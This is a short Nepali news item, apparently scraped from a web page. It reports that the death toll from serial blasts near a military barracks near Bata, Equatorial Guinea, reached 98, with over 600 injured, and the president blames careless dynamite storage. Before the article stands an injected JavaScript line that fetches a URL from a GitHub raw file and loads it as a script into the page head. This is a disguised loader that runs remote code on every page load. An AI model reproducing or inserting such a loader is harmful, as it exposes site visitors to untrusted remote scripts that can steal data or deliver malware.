;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
एजेन्सी । मध्य-अफ्रिकी मुलुक इक्वेटोरियल गिनीमा भएको श्रृंखलावद्ध बम विस्फोटमा ज्यान गुमाउनेको संख्या ९८ पुगेको छ।
गिनीको बाटा शहर नजिकै सोमबार एक सैनिक ब्यारेकनेर श्रृंखलावद्ध विस्फोट भएको थियो।
विस्फोटमा परेका ६०० जनाभन्दा धेरै घाइते भएका छन्। गम्भीर अवस्थामा रहेका २९९ जना अस्पतालमै उपचाररत छन्।
गिनीका राष्ट्रपतिले ब्यारेकमा डायनामाइटको भण्डारण लापरवाहीपूर्वक गरिएका कारण विस्फोट भएको बताएका छन्।
फेसबुक प्रतिक्रियाहरु